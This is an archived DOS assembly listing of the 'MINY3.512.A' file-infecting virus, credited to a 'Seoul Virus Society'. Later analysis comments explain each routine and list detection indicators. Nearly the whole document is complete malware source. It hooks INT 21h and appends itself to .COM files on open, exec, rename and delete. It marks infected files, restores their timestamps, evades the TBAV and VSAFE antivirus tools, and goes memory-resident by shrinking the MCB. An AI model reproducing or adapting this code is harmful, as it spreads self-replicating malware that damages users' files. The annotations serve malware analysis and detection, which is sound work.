Assembly Source File  |  1996-08-12  |  10KB  |  316 lines

  1. ;******************************************************************************
  2. ;
  3. ;         MINY3.512.A Virus
  4. ;
  5. ;     ╣A╕b: ¼ß╢ë ña╖í£ß»a ╡e╨s                           ╣A╕b: 1995æe 02╢⌐ 28╖⌐
  6. ;           Seoul Virus Society
  7. ;
  8. ;******************************************************************************
  9.  
  10.  
  ; Analysis note: this segment holds the whole virus body. Entry is its first
  ; instruction and is named as the start address by the END directive.
  11.      VIRUS SEGMENT PARA 'VIRUS'
  12.               ASSUME CS:VIRUS, DS:VIRUS
  13.  
  14.  Entry:   mov     SI,100h                    ; SI = base offset of this copy; the immediate at Entry+1 is rewritten per host (file length + 100h) before the body is appended
  15.           NOP
  16.           JMP     ChkVirinMEM                ; continue at the residency / installation check
  17.           NOP
  ; Analysis note: resident INT 21h handler. File-related DOS functions are
  ; diverted to InfectFile; AX=F036h is a private "already resident?" query that
  ; returns AX=0000h; everything else is chained to the saved original vector.
  ; The F036h/0000h query pair is a behavioural indicator for this sample.
  18.  NewInt21:       ; replacement INT 21h handler
  19.           PushF
  20.           NOP
  21.           cmp     ah,4Bh                      ; AH=4Bh: EXEC (load/execute program)
  22.           NOP
  23.           jz      InfectFile                  ; divert to the file-infection path
  24.  ChkAH:   cmp     ah,3Dh                      ; AH=3Dh: open file
  25.           jz      InfectFile
  26.           cmp     ah,43h                      ; AH=43h: get/set file attributes
  27.           jz      InfectFile
  28.           cmp     ah,56h                      ; AH=56h: rename file
  29.           jz      InfectFile
  30.           cmp     ah,6Ch                      ; AH=6Ch: extended open/create (original comment cites DOS 5.0)
  31.           jz      InfectFile
  32.           cmp     ah,41h                      ; AH=41h: delete file
  33.           jz      InfectFile
  34.  ChkAHF0: cmp     AX,0F036h                   ; private residency query issued by ChkVirinM
  35.           jnz     OrgInt21
  36.           PopF
  37.           xor     ax,ax                       ; answer the query with AX=0000h
  38.           IRET
  39.  OrgInt21:                                   ; chain to the original INT 21h handler
  40.           NOP
  41.           PopF
  42.           db      0EAh                        ; opcode byte of JMP FAR ptr16:16; its operand is the dword that follows
  43.  OldInt21 dd ?                                ; saved original INT 21h vector (offset, then segment)
  44.  
  ; Analysis note: calls the saved original INT 21h handler directly, bypassing
  ; the IVT. Callers load AX byte-swapped (function number in AL, subfunction in
  ; AH); the XCHG puts them back in the order DOS expects.
  45.  C_OldInt21:
  46.           NOP
  47.           xchg    ah,al                       ; AH = function number, AL = subfunction
  48.           PushF                               ; push flags so the handler's IRET returns here like after an INT
  49.           call    dword ptr CS:[OldInt21]
  50.           RET
  51.  
  52. ;------------------------------------------------------------------
  53. ;
  ; Analysis note: entry of the infection path. Saves the caller's registers,
  ; then scans the file name passed to the intercepted DOS call. Only names whose
  ; extension bytes are exactly ".COM" continue; a name containing 'V' before the
  ; dot, or any other extension, leaves through PopRES without touching the file.
  54.  InfectFile:
  55.           Push    AX                         ; save caller registers (restored at PopRES)
  56.           Push    BX
  57.           Push    CX
  58.           Push    DX
  59.           Push    DS
  60.           Push    ES
  61.           Push    SI
  62.           Push    DI
  63.           NOP
  64.           cmp     ah,6ch                     ; extended open: SI is left as the caller passed it
  65.           NOP
  66.           jz      Chk_EXTisCOM
  67.           mov     si,dx                      ; other functions: file name is at DS:DX
  68.  
  69.  Chk_EXTisCOM:
  70.           lodsb                              ; DS:[SI] -> AL
  71.           cmp     al,00                      ; end of name reached without finding a dot?
  72.           jz      JumpExit
  73.           cmp     al,'V'                     ; names containing an upper-case 'V' before the dot are skipped
  74.           jz      JumpExit
  75.           cmp     al,'.'                     ; start of the extension?
  76.           jnz     Chk_EXTisCOM
  77.           lodsw
  78.           cmp     ax,'OC'                    ; next two bytes must be 'C','O' (assuming MASM/TASM two-character constant ordering)
  79.           jnz     JumpExit
  80.           lodsb
  81.           cmp     al,'M'                     ; comparison is case-sensitive: upper-case "COM" only
  82.           jz      SetInt24h
  83.  JumpExit:
  84.           Jmp     PopRES                     ; not a .COM name: restore registers and chain
  85.  
  ; Analysis note: prepares the target file. Temporarily replaces the INT 24h
  ; (critical error) vector at 0000:0090h with NewInt24, saves the file's
  ; attributes on the stack, clears them, and opens the file read/write. The
  ; saved vector and attributes are restored at SetOrgAttr.
  86.  SetInt24h:
  87.           mov     bx,ds                      ; keep the caller's DS (file-name segment) in BX
  88.           xor     ax,ax
  89.           mov     ds,ax                      ; DS = 0000h: interrupt vector table
  90.           Push    DS:[0090h]                 ; save INT 24h offset (24h*4)
  91.           Push    DS:[0092h]                 ; save INT 24h segment
  92.           mov     word ptr DS:[0090h],offset NewInt24
  93.           mov     word ptr DS:[0092h],cs
  94.  
  95.           mov     ds,bx
  96.           mov     ax,0043h                   ; after the XCHG in C_OldInt21: AH=43h, AL=00h (get attributes)
  97.           call    C_OldInt21
  98.           Push    CX                         ; original attributes
  99.           Push    DX                         ; file-name offset
  100.           Push    DS                         ; file-name segment
  101.  
  102.           MOV     AX,0143h                   ; AH=43h, AL=01h (set attributes) with CX=0: clears all attribute bits
  103.           xor     cx,cx
  104.           call    C_OldInt21
  105.           jnc     Open_File
  106.  J_SET:   JMP     SetOrgAttr                 ; on failure, restore attributes and INT 24h
  107.  Open_File:
  108.           NOP
  109.           mov     ax,023dh                   ; AH=3Dh, AL=02h: open the file for read/write
  110.           call    C_OldInt21
  111.           jc      J_SET
  112.  
  113.           push    cs
  114.           pop     ds                         ; DS = CS (resident copy)
  115.           Push    cs
  116.           pop     es                         ; ES = CS
  117.           xchg    bx,ax                      ; BX = file handle
  118.  
  ; Analysis note: reads the first four bytes of the file into Org4bytes and
  ; applies the exclusion checks. The file is closed untouched when it starts
  ; with an EXE signature, when byte 3 equals byte 2 XOR 36h (the marker this
  ; code writes into infected files), when the four bytes equal V3_Str, or when
  ; the low word of its length is outside 1234..63210.
  119.  Read_File:
  120.           mov     ah,3Fh                     ; AH=3Fh: read from handle BX
  121.           mov     dx,offset Org4bytes        ; buffer: the saved-host-bytes field of the resident copy
  122.           mov     si,dx
  123.           mov     cx,0004h                   ; four bytes
  124.           int     21h
  125.  ChkEXEFile:
  126.           mov     AX,word ptr DS:[SI]        ; first word of the file
  127.           cmp     AX,'ZM'                    ; EXE signature, one byte order
  128.           jz      Close_File
  129.           cmp     ax,'MZ'                    ; EXE signature, other byte order
  130.           jz      Close_file
  131.  ChkFSize:
  132.           mov     al,byte ptr ds:[SI+3]      ; infection-marker test despite the label name
  133.           xor     al,36h
  134.           cmp     Al,ds:[SI+2]               ; byte3 XOR 36h == byte2 -> already infected
  135.           jz      Close_File
  136.  
  137.           mov     di,offset V3_Str           ; compare the four bytes with V3_Str (EB 13 73 43)
  138.           mov     cx,0004
  139.           repz    cmpsb
  140.           jz      Close_file                 ; all four equal: skip this file
  141.  
  142.           mov     al,02h                     ; seek to end of file; AH42h returns the position in DX:AX
  143.           call    AH42h
  144.           cmp     ax,1234                    ; low word of length below 1234: skip (DX is not examined)
  145.           jb      Close_File
  146.           cmp     ax,63210                   ; low word of length above 63210: skip
  147.           ja      Close_File
  148.  
  ; Analysis note: file-modification step, entered with AX = file length and the
  ; file pointer at end of file. It patches the per-host fields, appends the body
  ; (offset End_Virus bytes from DS:0000), overwrites the first four bytes of the
  ; file with FileHead, and restores the file's date/time stamp. Resulting
  ; on-disk indicators: byte 0 = E9h, byte 3 = byte 2 XOR 36h, unchanged timestamp.
  149.           Push    AX                         ; keep the file length
  150.           add     AX,0100h                   ; load offset of the appended body in a .COM image
  151.           mov     word ptr DS:[Entry+1],AX   ; becomes the immediate of "mov SI,imm16" at Entry
  152.           Pop     AX
  153.           sub     ax,0003                    ; near-jump displacement: file length minus the 3-byte jump
  154.           mov     word ptr ds:[FileHead+1],ax
  155.           mov     al,byte ptr ds:[FileHead+2] ; high byte of the displacement
  156.           xor     al,036h
  157.           mov     byte ptr ds:[FileHead+3],al ; marker byte tested at ChkFSize
  158.  
  159.           mov     ax,5700h                   ; AX=5700h: get file date/time (issued through INT 21h)
  160.           Int     21h
  161.           Push    CX                         ; time
  162.           Push    DX                         ; date
  163.  
  164.           mov     al,40h                     ; becomes AH=40h (write) after the XCHG in C_OldInt21
  165.           xor     dx,dx                      ; buffer DS:0000 = start of the resident body
  166.           mov     cx, offset End_Virus       ; byte count
  167.           call    C_OldInt21
  168.  
  169.           mov     al,00h                     ; seek back to the start of the file
  170.           call    AH42h
  171.  
  172.           mov     al,40h                     ; AH=40h (write) again
  173.           mov     dx, offset FileHead        ; 4 bytes: E9h, displacement word, marker
  174.           mov     cx,0004h
  175.           call    C_OldInt21
  176.  
  177.           Pop     dx                         ; original date
  178.           Pop     CX                         ; original time
  179.           mov     ax,5701h                   ; AX=5701h: set file date/time back
  180.           Int     21h
  181.  Close_File:                                 ; common exit: close handle BX
  182.           mov     ah,3eh
  183.           Int     21h
  184.  
  ; Analysis note: cleanup. Restores the file attributes saved in SetInt24h,
  ; puts the original INT 24h vector back, restores the caller's registers and
  ; lets the intercepted DOS call proceed through the original handler.
  185.  SetOrgAttr:
  186.           Pop     DS                         ; file-name segment
  187.           Pop     DX                         ; file-name offset
  188.           pop     CX                         ; original attributes
  189.           mov     ax,0143h                   ; AH=43h, AL=01h: set attributes
  190.           Call    C_OldInt21
  191.  
  192.           xor     ax,ax                      ; DS = 0000h: interrupt vector table
  193.           mov     ds,ax
  194.           POP     DS:[0092h]                 ; restore INT 24h segment
  195.           POP     DS:[0090h]                 ; restore INT 24h offset
  196.  PopRES:
  197.           Pop     DI                         ; restore the registers pushed at InfectFile
  198.           Pop     si
  199.           Pop     ES
  200.           Pop     ds
  201.           Pop     dx
  202.           Pop     cx
  203.           Pop     bx
  204.           Pop     ax
  205.           Jmp     OrgInt21                   ; OrgInt21 pops the flags saved at NewInt21 and chains
  206.  
  207. ;-------------------------------------------------------------------
  208. ;    Memory-resident installation
  209. ;    Decides whether to install, then (below) copies the body to the top of
  ;    the program's memory block.
  210.  
  ; Analysis note: installation is skipped (jump to Already_MEM) when the current
  ; INT 21h handler matches either of two fixed patterns, or when the AX=F036h
  ; query comes back as 0000h. The original comments name F-PROT, TBDRVX/TBAV and
  ; VSAFE next to these checks.
  211.  ChkVirinMEM:
  212.           xor     AX,AX                      ; counting loop to 1111h with no other effect (original comment names F-PROT)
  213.  A_F:     nop
  214.           inc     AX
  215.           NOp
  216.           cmp     AX,1111h
  217.           jnz     A_F
  218.           NOP
  219.           mov     dx,si                      ; keep the base offset in DX
  220.           mov     ax,3521h                   ; AX=3521h: get INT 21h vector into ES:BX
  221.           NOP
  222.           Int     21h
  223.           cmp     word ptr ES:[000Ah],'BT'   ; word at offset 0Ah of the handler's segment (original comment: TBDRVX)
  224.           jnz     ChkVSAFE
  225.           cmp     word ptr ES:[000Ch],'RD'   ; following word at offset 0Ch
  226.           jz      Already_MEM                ; both words match: do not install
  227.  ChkVSAFE:
  228.           cmp     byte ptr ES:[BX],0EAh      ; handler begins with a far-jump opcode? (original comment: VSAFE)
  229.           jnz     ChkVirinM
  230.           cmp     word ptr ES:[BX+5],80FBh   ; and has this word five bytes in
  231.           jnz     ChkVirinM
  232.           jmp     Already_MEM                ; both match: do not install
  233.  ChkVirinM:
  234.           mov     ax,36F0h                   ; AX=F036h after the XCHG below (the code uses F036h, not F035h)
  235.           xchg    ah,al                      ;
  236.           Int     21h                        ; residency query answered at ChkAHF0
  237.           or      ax,ax                      ;
  238.           jz      Already_MEM                ; AX=0000h: a copy is already resident
  239.  
  ; Analysis note: installation. Saves the current INT 21h vector, shrinks the
  ; memory block described by the MCB at CS-1 (only if it is marked 'Z'), copies
  ; the body to the freed top of that block, and writes the INT 21h vector at
  ; 0000:0084h directly. BX=1 from here on, so each displacement is written one
  ; lower than the offset it addresses. Indicators: reduced size of the last
  ; MCB, and an INT 21h vector pointing at offset NewInt21 in a segment near the
  ; top of conventional memory.
  240.           mov     word ptr DS:[OldInt21+SI],BX        ; save original INT 21h offset (SI = base of this copy)
  241.           Mov     word ptr DS:[OldInt21+2+SI],ES      ; save original INT 21h segment
  242.  
  243.           NOP
  244.           NOP
  245.           Push    cs
  246.           Pop     AX
  247.  
  248.           mov     CX,(offset Tend_virus - SEGORG +15 ) SHR 4 ; CX = size to reserve in 16-byte paragraphs, rounded up (SEGORG is not defined in the visible listing)
  249.           dec     ax
  250.           NOP
  251.           mov     ds,ax                      ; DS = CS-1: the MCB paragraph (assumes CS is the PSP segment of a .COM program)
  252.           mov     BX,0001
  253.           NOP
  254.           cmp     byte ptr DS:[BX-1],'Z'     ; MCB byte 0: 'Z' marks the last block in the chain
  255.           jnz     Already_MEM                ; not the last block: do not install
  256.           NOP
  257.           sub     word ptr DS:[BX+02],CX     ; MCB offset 03h: block size in paragraphs
  258.           NOP
  259.           sub     word ptr DS:[BX+11h],CX    ; (CS-1):0012h = CS:0002h, the PSP top-of-memory segment field
  260.           NOP
  261.           mov     ES,word ptr DS:[BX+11h]    ; ES = lowered top-of-memory segment (copy destination)
  262.           NOP
  263.           Push    cs                         ; DS = CS
  264.           Pop     ds
  265.  
  266.           mov     si,DX                      ; source: base of this copy
  267.           xor     di,di                      ; destination offset 0000h
  268.           mov     cx, offset TEnd_Virus      ; byte count: body plus trailing data
  269.           NOP
  270.           repz    movsb                      ; copy DS:SI -> ES:DI
  271.           NOP
  272.           mov     ds,cx                      ; CX is 0 after the copy, so DS = 0000h (vector table)
  273.           cli                                ; no interrupts while the vector is half-written
  274.           mov     word ptr ds:[BX+85h],es    ; 0000:0086h = INT 21h segment
  275.           mov     word ptr ds:[BX+83h],offset NewInt21 ; 0000:0084h = INT 21h offset
  276.           sti
  277.  
  ; Analysis note: hands control back to the host. The four bytes saved in
  ; Org4bytes are copied over CS:0100h and execution resumes there through a RET
  ; to the pushed 0100h.
  278.  Already_Mem:
  279.           mov     si,DX                      ; SI = base offset of this copy
  280.           push    cs                         ; DS = CS
  281.           pop     ds
  282.           push    cs                         ; ES = CS
  283.           pop     es
  284.  
  285.  Re_COM:          ; restore and run the host .COM program
  286.           add     si,offset Org4bytes        ; SI -> saved first four bytes of the host
  287.           mov     di,00FFh
  288.           Inc     di                         ; DI = 0100h, formed without a literal 0100h
  289.           push    di                         ; return address for the RET below
  290.           movsw
  291.           movsw                              ; four bytes restored at CS:0100h
  292.           xor     ax,ax
  293.           RET                                ; near return to 0100h (host entry point)
  294.  
  295.  Org4bytes        db 90h,90h,0cdh,20h         ; saved host bytes; initial value is NOP, NOP, INT 20h
  296.  
  ; Analysis note: seek helper. Moves the file pointer of handle BX by a zero
  ; offset (CX:DX = 0) from the origin the caller placed in AL; DOS returns the
  ; new position in DX:AX.
  297.  Ah42h:   xor     dx,dx
  298.           xor     cx,cx
  299.           mov     ah,42h                     ; AH=42h: move file pointer
  300.           Int     21h
  301.           RET
  302.  
  ; Analysis note: temporary critical-error handler, installed only for the
  ; duration of the infection path (see SetInt24h / SetOrgAttr).
  303.  NewInt24:        ; returns AL=00h for every critical error
  304.           XOR     AL,AL
  305.           IRET
  306.  
  ; Analysis note: trailing data. The '[Miny3]' text is a fixed ASCII string
  ; inside the body and so appears in every copy written from it.
  307.           db      '[Miny3]'                  ; name string embedded in the body
  308.  V3_Str   db      0EBh,13h,73h,43h           ; 4-byte pattern; files starting with it are skipped (the label suggests the V3 product — not confirmed by the code)
  309.  FileHead db      0E9h                       ; near-jump opcode; first of the 4 bytes written to the start of a host
  310.  End_VIRUS:                                  ; end of the bytes appended to a host file
  311.           db      ?,?,?                      ; FileHead+1..+3: displacement word and marker byte, filled in per host
  312.  TEnd_VIRUS:                                 ; end of the in-memory copy
  313.  
  314.    Virus  EndS
  315.     End  Entry
  316.